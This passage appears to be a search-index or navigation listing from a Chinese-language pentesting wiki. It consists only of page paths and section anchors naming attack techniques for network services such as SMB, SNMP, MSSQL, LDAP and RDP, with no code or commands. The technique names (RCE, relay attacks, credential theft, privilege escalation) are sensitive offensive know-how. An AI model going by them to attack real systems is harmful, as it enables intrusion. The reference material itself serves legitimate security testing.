g-msrpc.html#135-593---pentesting-msrpc","network-services-pentesting/135-pentesting-msrpc.html#基本信息","network-services-pentesting/135-pentesting-msrpc.html#msrpc是如何工作的","network-services-pentesting/135-pentesting-msrpc.html#识别暴露的rpc服务","network-services-pentesting/135-pentesting-msrpc.html#识别-ip-地址","network-services-pent
esting/135-pentesting-msrpc.html#使用有效凭据执行-rce","network-services-pentesting/135-pentesting-msrpc.html#端口-593","network-services-pentesting/135-pentesting-msrpc.html#msrpc-接口的自动模糊测试","network-services-pentesting/135-pentesting-msrpc.html#1-清点接口","network-services-pentesting/135-pentesting-msrpc.html#2-运行模糊测试器","network-services-pentesting/135-pentesting-msrpc.html#3-使用-neo4j-可视化","network-services-pentesting/135-pentesting-msrpc.html#自动化接口枚举与动态客户端生成-ntobjectmanager","network-services-pentesting/135-pentesting-msrpc.html#上下文感知的-rpc-模糊测试-ms-rpc-fuzzer","network-services-pentesting/135-pentesting-msrpc.html#参考文献","network-services-pentesting/137-138-139-pentesting-netbios.html#137138139---pentesting-netbios","network-services-pentesting/137-138-139-pentesting-netbios.html#netbios-名称服务","network-services-pentesting/137-138-139-pentesting-netbios.html#名称服务","network-services-pentesting/137-138-139-pentesting-netbios.html#数据报分发服务","network-services-pentesting/137-138-139-pentesting-netbios.html#session-service","network-services-pentesting/137-138-139-pentesting-netbios.html#hacktricks-自动命令","network-services-pentesting/pentesting-smb/index.html#139445---pentesting-smb","network-services-pentesting/pentesting-smb/index.html#端口-139","network-services-pentesting/pentesting-smb/index.html#port-445","network-services-pentesting/pentesting-smb/index.html#smb","network-services-pentesting/pentesting-smb/index.html#ipc-共享","network-services-pentesting/pentesting-smb/index.html#什么是-ntlm","network-services-pentesting/pentesting-smb/index.html#服务器枚举","network-services-pentesting/pentesting-smb/index.html#扫描--网络以搜索主机","network-services-pentesting/pentesting-smb/index.html#smb-服务器版本","network-services-pentesting/pentesting-smb/index.html#搜索-exploit","network-services-pentesting/pentesting-smb/index.html#可能的--凭据","network-services-pentesting/pentesting-smb/index.html#brute-force","network-services-pentesting/pentesting-smb/index.html#smb-环境信息","network-services-pentesting/pentesting-sm
b/index.html#获取信息","network-services-pentesting/pentesting-smb/index.html#枚举用户组和已登录用户","network-services-pentesting/pentesting-smb/index.html#枚举本地用户","network-services-pentesting/pentesting-smb/index.html#metasploit---枚举本地用户","network-services-pentesting/pentesting-smb/index.html#枚举-lsarpc-和-samr-rpcclient","network-services-pentesting/pentesting-smb/index.html#gui-connection-from-linux","network-services-pentesting/pentesting-smb/index.html#共享文件夹枚举","network-services-pentesting/pentesting-smb/index.html#列出共享文件夹","network-services-pentesting/pentesting-smb/index.html#连接列出-共享文件夹","network-services-pentesting/pentesting-smb/index.html#手动枚举-windows-共享并连接到它们","network-services-pentesting/pentesting-smb/index.html#从-windows-枚举共享--无需第三方工具","network-services-pentesting/pentesting-smb/index.html#挂载共享文件夹","network-services-pentesting/pentesting-smb/index.html#下载文件","network-services-pentesting/pentesting-smb/index.html#域共享文件夹搜索","network-services-pentesting/pentesting-smb/index.html#读取注册表","network-services-pentesting/pentesting-smb/index.html#后渗透","network-services-pentesting/pentesting-smb/index.html#使用-kerberos-进行认证","network-services-pentesting/pentesting-smb/index.html#执行命令","network-services-pentesting/pentesting-smb/index.html#crackmapexec","network-services-pentesting/pentesting-smb/index.html#psexec------smbexec","network-services-pentesting/pentesting-smb/index.html#wmiexec-dcomexec","network-services-pentesting/pentesting-smb/index.html#atexec","network-services-pentesting/pentesting-smb/index.html#impacket-参考","network-services-pentesting/pentesting-smb/index.html#ksmbd-攻击面-和-smb2smb3-协议-fuzzing-syzkaller","network-services-pentesting/pentesting-smb/index.html#bruteforce-用户凭证","network-services-pentesting/pentesting-smb/index.html#smb-relay-attack","network-services-pentesting/pentesting-smb/index.html#smb-trap","network-services-pentesting/pentesting-smb/index.html#smbtrap-using-mitmf","network-services-pentesting/pentesting-smb/index.html#ntlm-theft","network-s
ervices-pentesting/pentesting-smb/index.html#hacktricks-自动命令","network-services-pentesting/pentesting-smb/index.html#参考资料","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#ksmbd-attack-surface--smb2smb3-protocol-fuzzing-syzkaller","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#overview","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#expand-ksmbd-attack-surface-via-configuration","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#authentication-and-rate-limiting-adjustments-for-fuzzing","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#stateful-harness-extract-resources-and-chain-requests","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#基于语法的-smb2-生成-有效的-pdus","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#directed-fuzzing-with-focus_areas","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#用-anyblob-打破覆盖率停滞","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#sanitizers-超越-kasan","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#吞吐量与并行性说明","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#实用清单","network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.html#参考资料","network-services-pentesting/pentesting-smb/rpcclient-enumeration.html#rpcclient-enumeration","network-services-pentesting/pentesting-smb/rpcclient-enumeration.html#相对标识符-rid-和安全标识符-sid-概述","network-services-pentesting/pentesting-smb/rpcclient-enumeration.html#使用-rpcclient-进行枚举","network-services-pentesting/pentesting-imap.html#143993---pentesting-imap","network-services-pentesting/pentesting-imap.html#internet-message
-access-protocol","network-services-pentesting/pentesting-imap.html#横幅抓取","network-services-pentesting/pentesting-imap.html#ntlm-auth---信息泄露","network-services-pentesting/pentesting-imap.html#imap暴力破解","network-services-pentesting/pentesting-imap.html#语法","network-services-pentesting/pentesting-imap.html#演变","network-services-pentesting/pentesting-imap.html#curl","network-services-pentesting/pentesting-imap.html#shodan","network-services-pentesting/pentesting-imap.html#hacktricks-自动命令","network-services-pentesting/pentesting-snmp/index.html#1611621016110162udp---pentesting-snmp","network-services-pentesting/pentesting-snmp/index.html#基本信息","network-services-pentesting/pentesting-snmp/index.html#mib","network-services-pentesting/pentesting-snmp/index.html#oids","network-services-pentesting/pentesting-snmp/index.html#oid-示例","network-services-pentesting/pentesting-snmp/index.html#snmp-版本","network-services-pentesting/pentesting-snmp/index.html#社区字符串","network-services-pentesting/pentesting-snmp/index.html#端口","network-services-pentesting/pentesting-snmp/index.html#暴力破解社区字符串-v1-和-v2c","network-services-pentesting/pentesting-snmp/index.html#枚举-snmp","network-services-pentesting/pentesting-snmp/index.html#危险设置","network-services-pentesting/pentesting-snmp/index.html#访问设置","network-services-pentesting/pentesting-snmp/index.html#snmp-参数用于-microsoft-windows","network-services-pentesting/pentesting-snmp/index.html#cisco","network-services-pentesting/pentesting-snmp/index.html#从-snmp-到-rce","network-services-pentesting/pentesting-snmp/index.html#大规模-snmp","network-services-pentesting/pentesting-snmp/index.html#设备","network-services-pentesting/pentesting-snmp/index.html#识别私有字符串","network-services-pentesting/pentesting-snmp/index.html#用户名密码","network-services-pentesting/pentesting-snmp/index.html#电子邮件","network-services-pentesting/pentesting-snmp/index.html#修改-snmp-值","network-services-pentesting/pentesting-snmp/index.html#欺骗","network-services-pentesting/pentesting-snmp/index.
html#检查-snmp-配置文件","network-services-pentesting/pentesting-snmp/index.html#hacktricks-自动命令","network-services-pentesting/pentesting-snmp/cisco-snmp.html#cisco-snmp","network-services-pentesting/pentesting-snmp/cisco-snmp.html#pentesting-cisco-networks","network-services-pentesting/pentesting-snmp/cisco-snmp.html#通过-snmp-转储配置-cisco-config-copy-mib","network-services-pentesting/pentesting-snmp/cisco-snmp.html#metasploit-资源","network-services-pentesting/pentesting-snmp/cisco-snmp.html#最近的-cisco-snmp-漏洞-2023--2025","network-services-pentesting/pentesting-snmp/cisco-snmp.html#加固与检测提示","network-services-pentesting/pentesting-snmp/cisco-snmp.html#参考文献","network-services-pentesting/pentesting-snmp/snmp-rce.html#snmp-rce","network-services-pentesting/pentesting-snmp/snmp-rce.html#使用附加命令扩展服务","network-services-pentesting/pentesting-snmp/snmp-rce.html#注入命令以执行","network-services-pentesting/pentesting-snmp/snmp-rce.html#运行注入的命令","network-services-pentesting/pentesting-snmp/snmp-rce.html#使用snmp获取服务器shell","network-services-pentesting/pentesting-snmp/snmp-rce.html#参考文献","network-services-pentesting/pentesting-irc.html#19466676660-7000---pentesting-irc","network-services-pentesting/pentesting-irc.html#基本信息","network-services-pentesting/pentesting-irc.html#枚举","network-services-pentesting/pentesting-irc.html#横幅","network-services-pentesting/pentesting-irc.html#手动","network-services-pentesting/pentesting-irc.html#查找和扫描irc服务","network-services-pentesting/pentesting-irc.html#暴力破解","network-services-pentesting/pentesting-irc.html#shodan","network-services-pentesting/pentesting-264-check-point-firewall-1.html#获取防火墙和管理站名称","network-services-pentesting/pentesting-264-check-point-firewall-1.html#主机名和-ica-名称发现的替代方法","network-services-pentesting/pentesting-264-check-point-firewall-1.html#参考文献","network-services-pentesting/pentesting-ldap.html#389-636-3268-3269---pentesting-ldap","network-services-pentesting/pentesting-ldap.html#ldap-数据交换格式","network-services-pentesting/pentesting-ldap.html#写入
数据","network-services-pentesting/pentesting-ldap.html#sniff-clear-text-credentials","network-services-pentesting/pentesting-ldap.html#anonymous-access","network-services-pentesting/pentesting-ldap.html#bypass-tls-sni-check","network-services-pentesting/pentesting-ldap.html#ldap-匿名绑定","network-services-pentesting/pentesting-ldap.html#有效凭据","network-services-pentesting/pentesting-ldap.html#暴力破解","network-services-pentesting/pentesting-ldap.html#枚举","network-services-pentesting/pentesting-ldap.html#自动化","network-services-pentesting/pentesting-ldap.html#python","network-services-pentesting/pentesting-ldap.html#windapsearch","network-services-pentesting/pentesting-ldap.html#ldapsearch","network-services-pentesting/pentesting-ldap.html#图形界面","network-services-pentesting/pentesting-ldap.html#apache-directory","network-services-pentesting/pentesting-ldap.html#jxplorer","network-services-pentesting/pentesting-ldap.html#godap","network-services-pentesting/pentesting-ldap.html#ldapx","network-services-pentesting/pentesting-ldap.html#通过-kerberos-进行身份验证","network-services-pentesting/pentesting-ldap.html#post","network-services-pentesting/pentesting-ldap.html#配置文件","network-services-pentesting/pentesting-ldap.html#hacktricks-自动命令","network-services-pentesting/ipsec-ike-vpn-pentesting.html#500udp---pentesting-ipsecike-vpn","network-services-pentesting/ipsec-ike-vpn-pentesting.html#基本信息","network-services-pentesting/ipsec-ike-vpn-pentesting.html#使用-nmap-发现--服务","network-services-pentesting/ipsec-ike-vpn-pentesting.html#寻找有效的转换","network-services-pentesting/ipsec-ike-vpn-pentesting.html#服务器指纹识别","network-services-pentesting/ipsec-ike-vpn-pentesting.html#查找正确的-id组名","network-services-pentesting/ipsec-ike-vpn-pentesting.html#使用-ike-scan-进行暴力破解-id","network-services-pentesting/ipsec-ike-vpn-pentesting.html#使用-iker-进行-id-暴力破解","network-services-pentesting/ipsec-ike-vpn-pentesting.html#使用-ikeforce-进行-id-暴力破解","network-services-pentesting/ipsec-ike-vpn-pentesting.html#sniffing-id","networ
k-services-pentesting/ipsec-ike-vpn-pentesting.html#capturing--cracking-the-hash","network-services-pentesting/ipsec-ike-vpn-pentesting.html#xauth","network-services-pentesting/ipsec-ike-vpn-pentesting.html#本地网络-mitm-捕获凭证","network-services-pentesting/ipsec-ike-vpn-pentesting.html#使用ikeforce暴力破解xauth用户名和密码","network-services-pentesting/ipsec-ike-vpn-pentesting.html#使用ipsec-vpn进行身份验证","network-services-pentesting/ipsec-ike-vpn-pentesting.html#参考材料","network-services-pentesting/ipsec-ike-vpn-pentesting.html#shodan","network-services-pentesting/pentesting-modbus.html#基本信息","network-services-pentesting/pentesting-modbus.html#枚举","network-services-pentesting/512-pentesting-rexec.html#512---pentesting-rexec","network-services-pentesting/512-pentesting-rexec.html#基本信息","network-services-pentesting/512-pentesting-rexec.html#协议快速查看","network-services-pentesting/512-pentesting-rexec.html#使用客户端的手动方式","network-services-pentesting/512-pentesting-rexec.html#枚举与暴力破解","network-services-pentesting/512-pentesting-rexec.html#暴力破解","network-services-pentesting/512-pentesting-rexec.html#nmap","network-services-pentesting/512-pentesting-rexec.html#hydra--medusa--ncrack","network-services-pentesting/512-pentesting-rexec.html#metasploit","network-services-pentesting/512-pentesting-rexec.html#捕获凭据","network-services-pentesting/512-pentesting-rexec.html#后期利用提示","network-services-pentesting/512-pentesting-rexec.html#加固--检测","network-services-pentesting/512-pentesting-rexec.html#参考文献","network-services-pentesting/pentesting-rlogin.html#513---pentesting-rlogin","network-services-pentesting/pentesting-rlogin.html#基本信息","network-services-pentesting/pentesting-rlogin.html#登录","network-services-pentesting/pentesting-rlogin.html#暴力破解","network-services-pentesting/pentesting-rlogin.html#查找文件","network-services-pentesting/pentesting-rsh.html#514---pentesting-rsh","network-services-pentesting/pentesting-rsh.html#基本信息","network-services-pentesting/pentesting-rsh.html#登录","network-services-pentesting/pen
testing-rsh.html#暴力破解","network-services-pentesting/pentesting-rsh.html#参考文献","network-services-pentesting/515-pentesting-line-printer-daemon-lpd.html#lpd协议简介","network-services-pentesting/515-pentesting-line-printer-daemon-lpd.html#与lpd打印机交互的工具","network-services-pentesting/515-pentesting-line-printer-daemon-lpd.html#shodan","network-services-pentesting/584-pentesting-afp.html#548---pentesting-apple-filing-protocol-afp","network-services-pentesting/584-pentesting-afp.html#基本信息","network-services-pentesting/584-pentesting-afp.html#枚举","network-services-pentesting/584-pentesting-afp.html#快速横幅--服务器信息","network-services-pentesting/584-pentesting-afp.html#与共享交互","network-services-pentesting/584-pentesting-afp.html#常见漏洞与利用","network-services-pentesting/584-pentesting-afp.html#netatalk-未经身份验证的-rce-链-2022","network-services-pentesting/584-pentesting-afp.html#netatalk-opensession-堆溢出-2018","network-services-pentesting/584-pentesting-afp.html#其他显著问题","network-services-pentesting/584-pentesting-afp.html#防御建议","network-services-pentesting/584-pentesting-afp.html#暴力破解","network-services-pentesting/584-pentesting-afp.html#参考文献","network-services-pentesting/554-8554-pentesting-rtsp.html#5548554---pentesting-rtsp","network-services-pentesting/554-8554-pentesting-rtsp.html#基本信息","network-services-pentesting/554-8554-pentesting-rtsp.html#关键细节","network-services-pentesting/554-8554-pentesting-rtsp.html#枚举","network-services-pentesting/554-8554-pentesting-rtsp.html#暴力破解","network-services-pentesting/554-8554-pentesting-rtsp.html#其他有用的程序","network-services-pentesting/554-8554-pentesting-rtsp.html#参考文献","network-services-pentesting/623-udp-ipmi.html#623udptcp---ipmi","network-services-pentesting/623-udp-ipmi.html#基本信息","network-services-pentesting/623-udp-ipmi.html#ipmi-概述","network-services-pentesting/623-udp-ipmi.html#枚举","network-services-pentesting/623-udp-ipmi.html#发现","network-services-pentesting/623-udp-ipmi.html#ipmi-vulnerabilities","network-services-pentesting/623-udp-ipmi.htm
l#ipmi-authentication-bypass-via-cipher-0","network-services-pentesting/623-udp-ipmi.html#ipmi-20-rakp-认证远程密码哈希检索","network-services-pentesting/623-udp-ipmi.html#ipmi-匿名认证","network-services-pentesting/623-udp-ipmi.html#supermicro-ipmi-明文密码","network-services-pentesting/623-udp-ipmi.html#supermicro-ipmi-upnp-漏洞","network-services-pentesting/623-udp-ipmi.html#暴力破解","network-services-pentesting/623-udp-ipmi.html#通过-bmc-访问主机","network-services-pentesting/623-udp-ipmi.html#从主机向-bmc-引入后门","network-services-pentesting/623-udp-ipmi.html#shodan","network-services-pentesting/623-udp-ipmi.html#references","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#internet-printing-protocol","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#quick-poc--crafting-raw-ipp-with-python","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#枚举与侦察","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#1-nmap-nse","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#2-来自-cups-的-ipp-工具","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#3-shodan--censys-dorks","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#最近的漏洞-2023-2025","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#cups-browsed-rce链-2024年9月","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#cupsd符号链接-listen-配置错误-cve-2024-35235","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#攻击技术","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#防御最佳实践","network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.html#参考文献","network-services-pentesting/700-pentesting-epp.html#700---pentesting-epp","network-services-pentesting/700-pentesting-epp.html#基本信息","network-services-pentesting/700-pentesting-epp.html#渗透测试","network-s
ervices-pentesting/700-pentesting-epp.html#枚举与侦察","network-services-pentesting/700-pentesting-epp.html#open-source-clients-useful-for-testing","network-services-pentesting/700-pentesting-epp.html#常见弱点与2023-2025年漏洞","network-services-pentesting/700-pentesting-epp.html#xxe--ssrf-负载适用于许多javaspring实现","network-services-pentesting/700-pentesting-epp.html#其他典型发现","network-services-pentesting/700-pentesting-epp.html#攻击路径从零到-tld-劫持","network-services-pentesting/700-pentesting-epp.html#防御措施与加固","network-services-pentesting/700-pentesting-epp.html#参考文献","network-services-pentesting/873-pentesting-rsync.html#873---pentesting-rsync","network-services-pentesting/873-pentesting-rsync.html#基本信息","network-services-pentesting/873-pentesting-rsync.html#枚举","network-services-pentesting/873-pentesting-rsync.html#横幅与手动通信","network-services-pentesting/873-pentesting-rsync.html#枚举共享文件夹","network-services-pentesting/873-pentesting-rsync.html#brute-force","network-services-pentesting/873-pentesting-rsync.html#手动-rsync-使用","network-services-pentesting/873-pentesting-rsync.html#post","network-services-pentesting/873-pentesting-rsync.html#参考","network-services-pentesting/1026-pentesting-rusersd.html#1026---pentesting-rusersd","network-services-pentesting/1026-pentesting-rusersd.html#基本信息","network-services-pentesting/1026-pentesting-rusersd.html#枚举","network-services-pentesting/1080-pentesting-socks.html#1080---pentesting-socks","network-services-pentesting/1080-pentesting-socks.html#基本信息","network-services-pentesting/1080-pentesting-socks.html#枚举","network-services-pentesting/1080-pentesting-socks.html#身份验证检查","network-services-pentesting/1080-pentesting-socks.html#暴力破解","network-services-pentesting/1080-pentesting-socks.html#隧道和端口转发","network-services-pentesting/1080-pentesting-socks.html#基本的-proxychains-使用","network-services-pentesting/1099-pentesting-java-rmi.html#109810991050---pentesting-java-rmi---rmi-iiop","network-services-pentesting/1099-pentesting-java-rmi.html#基本信息","network-servic
es-pentesting/1099-pentesting-java-rmi.html#rmi-组件","network-services-pentesting/1099-pentesting-java-rmi.html#rmi-enumeration","network-services-pentesting/1099-pentesting-java-rmi.html#bruteforcing-remote-methods","network-services-pentesting/1099-pentesting-java-rmi.html#已知接口","network-services-pentesting/1099-pentesting-java-rmi.html#shodan","network-services-pentesting/1099-pentesting-java-rmi.html#tools","network-services-pentesting/1099-pentesting-java-rmi.html#references","network-services-pentesting/1099-pentesting-java-rmi.html#hacktricks-自动命令","network-services-pentesting/1414-pentesting-ibmmq.html#1414---pentesting-ibm-mq","network-services-pentesting/1414-pentesting-ibmmq.html#基本信息","network-services-pentesting/1414-pentesting-ibmmq.html#工具","network-services-pentesting/1414-pentesting-ibmmq.html#安装-pymqi","network-services-pentesting/1414-pentesting-ibmmq.html#使用-punch-q","network-services-pentesting/1414-pentesting-ibmmq.html#枚举","network-services-pentesting/1414-pentesting-ibmmq.html#队列管理器","network-services-pentesting/1414-pentesting-ibmmq.html#channels","network-services-pentesting/1414-pentesting-ibmmq.html#队列","network-services-pentesting/1414-pentesting-ibmmq.html#利用","network-services-pentesting/1414-pentesting-ibmmq.html#转储消息","network-services-pentesting/1414-pentesting-ibmmq.html#代码执行","network-services-pentesting/1414-pentesting-ibmmq.html#custom-pcf","network-services-pentesting/1414-pentesting-ibmmq.html#测试环境","network-services-pentesting/1414-pentesting-ibmmq.html#参考文献","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#1433---pentesting-mssql---microsoft-sql-server","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#基本信息","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#默认-ms-sql-系统表","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#枚举","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#自动枚举","networ
k-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#暴力破解","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#手动枚举","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#tricks","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#execute-os-commands","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#获取哈希密码","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#steal-netntlm-hash--relay-attack","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#滥用-mssql-受信任链接","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#写入文件","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#使用--openrowset--读取文件","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#rce读取文件执行脚本python-和-r","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#读取注册表","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#使用-mssql-用户定义函数进行-rce---sqlhttp","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#使用-autoadmin_task_agents-进行-rce","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#其他-rce-方法","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#mssql-权限提升","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#从-db_owner-到-sysadmin","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#冒充其他用户","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#使用-mssql-进行持久化","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#从-sql-server-连接服务器提取密码","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#本地权限提升","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#shodan","network-services-pentesting/pentest
ing-mssql-microsoft-sql-server/index.html#参考文献","network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html#hacktricks-自动命令","network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.html#mssql-用户类型","network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html#15211522-1529---pentesting-oracle-tns-listener","network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html#基本信息","network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html#摘要","network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html#文章","network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.html#hacktricks-自动命令","network-services-pentesting/1723-pentesting-pptp.html#1723---pentesting-pptp","network-services-pentesting/1723-pentesting-pptp.html#基本信息","network-services-pentesting/1723-pentesting-pptp.html#枚举","network-services-pentesting/1723-pentesting-pptp.html#暴力破解","network-services-pentesting/1723-pentesting-pptp.html#漏洞","network-services-pentesting/1883-pentesting-mqtt-mosquitto.html#1883---pentesting-mqtt-mosquitto","network-services-pentesting/1883-pentesting-mqtt-mosquitto.html#基本信息","network-services-pentesting/1883-pentesting-mqtt-mosquitto.html#inspecting-the-traffic","network-services-pentesting/1883-pentesting-mqtt-mosquitto.html#暴力破解-mqtt","network-services-pentesting/1883-pentesting-mqtt-mosquitto.html#渗透测试-mqtt","network-services-pentesting/1883-pentesting-mqtt-mosquitto.html#发布订阅模式","network-services-pentesting/1883-pentesting-mqtt-mosquitto.html#数据包格式","network-services-pentesting/1883-pentesting-mqtt-mosquitto.html#数据包类型","network-services-pentesting/1883-pentesting-mqtt-mosquitto.html#shodan","network-services-pentesting/nfs-service-pentesting.html#2049---pentesting-nfs-service","network-services-pentesting/nfs-service-pentesting.html#基本信息","network-services-pentesting/nfs-service-pentesting.html#认证","network-services-pentesting/nfs-service-pentesting.html#版本",
"network-services-pentesting/nfs-service-pentesting.html#压缩","network-services-pentesting/nfs-service-pentesting.html#子树检查","network-services-pentesting/nfs-service-pentesting.html#枚举","network-services-pentesting/nfs-service-pentesting.html#showmount","network-services-pentesting/nfs-service-pentesting.html#有用的-nmap-脚本","network-services-pentesting/nfs-service-pentesting.html#有用的metasploit模块","network-services-pentesting/nfs-service-pentesting.html#nfs_analyze","network-services-pentesting/nfs-service-pentesting.html#mounting","network-services-pentesting/nfs-service-pentesting.html#攻击","network-services-pentesting/nfs-service-pentesting.html#信任-uid-和-gid","network-services-pentesting/nfs-service-pentesting.html#suid-权限提升","network-services-pentesting/nfs-service-pentesting.html#从导出中逃逸","network-services-pentesting/nfs-service-pentesting.html#nsfshell","network-services-pentesting/nfs-service-pentesting.html#配置文件","network-services-pentesting/nfs-service-pentesting.html#危险设置","network-services-pentesting/nfs-service-pentesting.html#利用nfs错误配置进行权限提升","network-services-pentesting/nfs-service-pentesting.html#hacktricks自动命令","network-services-pentesting/pentesting-compaq-hp-insight-manager.html#2301tcp---pentesting-compaqhp-insight-manager","network-services-pentesting/pentesting-compaq-hp-insight-manager.html#默认密码","network-services-pentesting/pentesting-compaq-hp-insight-manager.html#配置文件","network-services-pentesting/2375-pentesting-docker.html#2375-2376-pentesting-docker","network-services-pentesting/2375-pentesting-docker.html#docker-基础","network-services-pentesting/2375-pentesting-docker.html#基本信息","network-services-pentesting/2375-pentesting-docker.html#枚举","network-services-pentesting/2375-pentesting-docker.html#破坏","network-services-pentesting/2375-pentesting-docker.html#提权","network-services-pentesting/2375-pentesting-docker.html#在运行的-docker-容器中发现秘密","network-services-pentesting/2375-pentesting-docker.html#securing-your-docker","network-services-pentesting/237
5-pentesting-docker.html#参考文献","network-services-pentesting/3128-pentesting-squid.html#基本信息","network-services-pentesting/3128-pentesting-squid.html#枚举","network-services-pentesting/3128-pentesting-squid.html#web-代理","network-services-pentesting/3128-pentesting-squid.html#nmap-代理化","network-services-pentesting/3128-pentesting-squid.html#spose-扫描器","network-services-pentesting/3260-pentesting-iscsi.html#3260---pentesting-iscsi","network-services-pentesting/3260-pentesting-iscsi.html#基本信息","network-services-pentesting/3260-pentesting-iscsi.html#枚举","network-services-pentesting/3260-pentesting-iscsi.html#暴力破解","network-services-pentesting/3260-pentesting-iscsi.html#在linux上挂载iscsi","network-services-pentesting/3260-pentesting-iscsi.html#在-windows-上挂载-iscsi","network-services-pentesting/3260-pentesting-iscsi.html#手动枚举","network-services-pentesting/3260-pentesting-iscsi.html#shodan","network-services-pentesting/3260-pentesting-iscsi.html#参考文献","network-services-pentesting/3299-pentesting-saprouter.html#3299tcp---pentesting-saprouter","network-services-pentesting/3299-pentesting-saprouter.html#使用-metasploit-理解-saprouter-渗透","network-services-pentesting/3299-pentesting-saprouter.html#最近的漏洞-2022-2025","network-services-pentesting/3299-pentesting-saprouter.html#cve-2022-27668--不当访问控制--远程管理命令执行","network-services-pentesting/3299-pentesting-saprouter.html#更新的工具和技巧","network-services-pentesting/3299-pentesting-saprouter.html#加固和检测清单","network-services-pentesting/3299-pentesting-saprouter.html#参考文献","network-services-pentesting/3299-pentesting-saprouter.html#shodan","network-services-pentesting/pentesting-mysql.html#3306---pentesting-mysql","network-services-pentesting/pentesting-mysql.html#基本信息","network-services-pentesting/pentesting-mysql.html#连接","network-services-pentesting/pentesting-mysql.html#本地","network-services-pentesting/pentesting-mysql.html#远程","network-services-pentesting/pentesting-mysql.html#外部枚举","network-services-pentesting/pentesting-mysql.html#brute-force","n
etwork-services-pentesting/pentesting-mysql.html#写入任意二进制数据","network-services-pentesting/pentesting-mysql.html#mysql-命令","network-services-pentesting/pentesting-mysql.html#mysql-权限枚举","network-services-pentesting/pentesting-mysql.html#mysql-file-rce","network-services-pentesting/pentesting-mysql.html#mysql-arbitrary-read-file-by-client","network-services-pentesting/pentesting-mysql.html#post","network-services-pentesting/pentesting-mysql.html#mysql-用户","network-services-pentesting/pentesting-mysql.html#权限提升","network-services-pentesting/pentesting-mysql.html#privilege-escalation-via-library","network-services-pentesting/pentesting-mysql.html#从文件中提取-mysql-凭据","network-services-pentesting/pentesting-mysql.html#启用日志记录","network-services-pentesting/pentesting-mysql.html#有用的文件","network-services-pentesting/pentesting-mysql.html#默认-mysql-数据库表","network-services-pentesting/pentesting-mysql.html#hacktricks-自动命令","network-services-pentesting/pentesting-mysql.html#2023-2025-亮点新","network-services-pentesting/pentesting-mysql.html#jdbc-propertiestransform-反序列化-cve-2023-21971","network-services-pentesting/pentesting-mysql.html#恶意伪造-mysql-服务器对-jdbc-客户端的攻击","network-services-pentesting/pentesting-mysql.html#破解-caching_sha2_password-哈希","network-services-pentesting/pentesting-mysql.html#硬化检查清单-2025","network-services-pentesting/pentesting-mysql.html#参考资料","network-services-pentesting/pentesting-rdp.html#3389---pentesting-rdp","network-services-pentesting/pentesting-rdp.html#基本信息","network-services-pentesting/pentesting-rdp.html#枚举","network-services-pentesting/pentesting-rdp.html#自动化","network-services-pentesting/pentesting-rdp.html#暴力破解","network-services-pentesting/pentesting-rdp.html#密码喷射","network-services-pentesting/pentesting-rdp.html#使用已知凭据哈希连接","network-services-pentesting/pentesting-rdp.html#检查已知凭据是否适用于-rdp-服务","network-services-pentesting/pentesting-rdp.html#攻击","network-services-pentesting/pentesting-rdp.html#会话窃取","network-services-pentesting/p